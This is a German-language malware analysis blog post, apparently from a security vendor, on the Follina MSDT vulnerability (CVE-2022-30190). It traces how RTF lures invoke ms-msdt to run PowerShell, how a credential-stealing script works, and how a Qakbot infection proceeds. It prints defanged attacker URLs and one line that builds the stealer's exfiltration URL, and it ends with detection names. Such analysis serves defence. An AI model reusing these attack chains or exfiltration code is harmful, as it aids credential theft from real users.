Am 30. Mai 2022 wurde CVE-2022-30190 „FOLLINA“, eine Zero-Day-Sicherheitslücke zur Remotecodeausführung mit hohem Schweregrad (CVSS:9.3), im Microsoft Windows Support Diagnostic Tool (MSDT) entdeckt.
Dieses MSDT-Tool diagnostiziert Probleme mit Anwendungen wie Microsoft Office-Dokumenten. Ursprüngliche Angriffsvektoren wie Word-Dokumente nutzen eine Remote-Vorlagenfunktion zum Herunterladen der HTML-Datei, die dann über das URL-Protokoll das Diagnosetool (MSDT) aufruft und Schadcode ausführt. Während die anfänglichen Angriffe auf Microsoft Word beschränkt waren, wurden die Angriffsvektoren in letzter Zeit auf RTF und Outlook ausgeweitet.
Diese Sicherheitslücke wurde bereits ausgenutzt. Angreifer, die sie erfolgreich nutzen, können beliebigen Code ausführen und zusätzliche Programme installieren. Sie nutzen diese Schwachstelle, um Backdoors, AsyncRAT, Quakbot und andere Schadsoftware an Verbraucher und Branchen in Nordamerika und Europa zu verbreiten.
Detaillierte Analyse der Sicherheitslücke:
Die erste aufrufende Anwendung für das MSDT-Tool ist Microsoft Office (Word, Excel, RTF usw.).

Abb. Flussdiagramm
Unten sehen Sie ein Beispiel für ein RTF-Beispiel mit dem Namen „Employment_Agreement_Template“. Diese RTF-Dokumente verwenden OLE-Objekte.

Abb. RTF-Datei mit OLE-Objekte
Wenn dieses Dokument geöffnet wird, wird die folgende Meldung angezeigt:

Sobald das Opfer auf „Ja“ klickt, wird eine verschlüsselte HTML-Datei vom eingebetteten Link http[:]//45[.]76[.]53[.]253/1.html heruntergeladen, wie unten dargestellt:-
HTML-Dokumente enthalten kommentierte „A“-Zeichen am Ende der Datei, die sich unter dem Code befinden.

Abb.: Kodierte Daten in HTML-Datei
Eingebetteter Code in der HTML-Datei ruft PCWDiagnostic mit ms-msdt und dem Parameter IT_BrowseForFile auf, der PowerShell-Syntax enthält. Der dekodierte Teil der base64-kodierten Daten ist –
![]()
Abb. Dekodierte Daten
Dieser Code stoppt die msdt.exe, falls sie ausgeführt wird, stellt eine Verbindung zur URL „hXXps [:]//seller-notification [.]live/Zgfbe234dg“ her und lädt ein POWERSHELL-Skript herunter.
Der Follina-Exploit wurde verwendet, um PowerShell-basierter Stealer. Lassen Sie uns den Inhalt genauer betrachten:

Abb. Skriptinhalt Teil 1
Das Skript listet Appdata/Roaming auf und versucht, Anmeldedaten, Cookies usw. von Anwendungen wie Firefox, Opera, Yandex, Vivaldi, CentBrowser, Comodo, Chedot, Orbitum, Chromium, Slimjet, Xvast, Kinza, Iridium, CocCoc, AVAST Software, Chrome, Outlook, Thunderbird, NetSarang, Windows Live, FileZilla, MobaXterm und WeChat zu stehlen.
Der Stealer fragt die Registrierung ab, um Informationen zu den folgenden Anwendungen zu stehlen: Autodesk, MobaXterm, Oray SunLogin RemoteClient, MailMaster, Navicat, WinSCP, Microsoft Office, FTP, RAdmin usw.

Abb. Skriptinhalt Teil 2
Darüber hinaus sammelt es auch Informationen zur Maschine:
- Systeminfo (einschließlich Hostname, Betriebssystem-bezogene Informationen, Besitzer, BIOS-Informationen, Registrierter Besitzer
Produkt-ID, ursprüngliches Installationsdatum, Systemstartzeit, Systemhersteller, Systemmodell, Systemtyp, Prozessor, BIOS-Version, Systemgebietsschema, Zeitzone, gesamter physischer Speicher, Domäne, Anmeldeserver usw.) - IP-Konfiguration (über Ipconfig)
- Workstation-Konfiguration
- Informationen zu Benutzerkonten
- Lokale Gruppenadministratoren
- Produktnamenversionen
Eine ZIP-Datei wird in %temp% erstellt und an die URL gesendet:
$http_url = „hxxp://45[.]77.156[.]179:443/“ + $ip + „———-“ + $time1 + „.zip“
$time1 ist der Epochenzeitstempel, berechnet durch
![]()
Dies dient auch als Virtualisierungsprüfung.
Sehen wir uns ein weiteres Beispiel von Quakbot an:
Phishing-E-Mail mit schädlichen HTML-Anhängen lädt Archivdateien (.img) herunter (ed63c189b52e4eb663598dc0c3121e05). Dieses Archiv enthält .lnk (76390978f26d3c6d7f799257542796ce), Qbot-Nutzlast (a14d48974eab6839b1238f984b3c28d2) und doc-Datei (e7015438268464cedad98b1544d643ad).

Abb. Flussdiagramm
Die Qbot-Nutzlast in der ZIP-Datei wird über .lnk ausgeführt, und die .doc-Datei lädt die HTML-Datei herunter. Diese .html-Datei lädt wiederum eine weitere .qbot-Nutzlast herunter, indem sie Follina ausnutzt.
Hier wird die HTML-Datei von http[:]//185[.]234[.]247[.]119 heruntergeladen und enthält die in der folgenden Abbildung gezeigten Daten:-

Abb. HTML-Dateidaten
Dieses HTML stellt eine Verbindung zu den oben genannten URLs her und lädt die Quakbot-DLL (ce86511634b5420332eb6267c0e2ae2e) herunter, die dann über regsvr32.exe ausgeführt wird.
Analyse:
Diese Quakbot-Datei ist eine Delphi-kompilierte Datei mit verschlüsselten Daten im .rsrc-Abschnitt innerhalb von RCDATA, die im virtuell zugewiesenen Speicher entschlüsselt werden. Die folgenden Abbildungen zeigen die verschlüsselten Daten und die Entschlüsselungsschleife.

Abb. Verschlüsselte Daten

Abb. Beschreibung Schleife
Dies wird in APIs entschlüsselt und 1st Stage-PE-Datei

Der Ablauf geht nun zur ersten Stufe über, die für die DLL-Injektion zuständig ist und die Quakbot-Nutzlast in den Speicher bringt. Die verschlüsselten Zeichenfolgen werden RC1-entschlüsselt, wodurch die Liste der Prozesse, z. B. AV-bezogene Prozesse usw., angezeigt wird. Werden diese ausgeführt, wird die Nutzlast beendet. In der folgenden Abbildung sehen wir die überprüften Prozesse.

Die Liste der überprüften Prozesse umfasst:

Später führt es eine Prozessinjektion in „onedrivesetup.exe“ durch:-

Qbot ist mit der Kampagne „obama186“ verbunden. Unten sehen Sie das Bild, das die C2-Verbindungen von „onedrivesetup.exe“ zeigt:

Bypass-Techniken:
Wir haben beobachtet, dass Angreifer in ihren ersten Angriffsvektoren Verschlüsselungsmethoden verwenden, um Erkennungen zu umgehen. Die folgenden Beispiele veranschaulichen dies.

Abb. Beispiel Nr. 1

Abb. Beispiel Nr. 2
Fazit:
Dies ist einer der kritischsten Zero-Day-Angriffe der letzten Zeit. Dieser CVE nutzt zahlreiche Bypass-Techniken, ist nicht behoben und kann leicht ausgenutzt werden. Sobald der Sicherheitspatch von Microsoft verfügbar ist, sollten Nutzer den Angriff umgehend beheben. Bis dahin raten wir Unternehmen, wachsam zu sein und die folgenden Maßnahmen zu ergreifen, um die Angriffsfläche und mögliche Schäden zu reduzieren.
Zur Sanierung von „Follina“ befolgen Sie bitte die Hinweise:
Wie schützt Quick Heal seine Kunden?
Die vorhandenen fortschrittlichen Schutztechnologien der Quick Heal-Produkte schützen unsere Kunden vor Follina.
Wir haben in unserer Verhaltenstechnologie eine Erkennung namens „CVE_2022_30190_Follina“ für Follina. Ebenso in der Seqrite Für Produkte von Hawk Hunt gilt folgende Richtlinie: „QHIR_CVE_2022_30190_Follina“ um diesen Angriff zu identifizieren.
Nachfolgend sind die datei- und netzwerkbasierten Erkennungen für Follina aufgeführt:
1. Dateibasiert:
- Backdoor.Turian.S28183972
- Trojan.Qbot.S28211728
- CVE-2022-30190.46655
- CVE-2022-30190.46638
- CVE-2022-30190.46635
- CVE-2022-30190.46624
2.Netzwerkbasiert:
- CVE-2022-30190.RCE!46674
- CVE-2022-30190.RCE!46675
Fachexperten
Tejaswini Sandapolla
Amruta Wagh



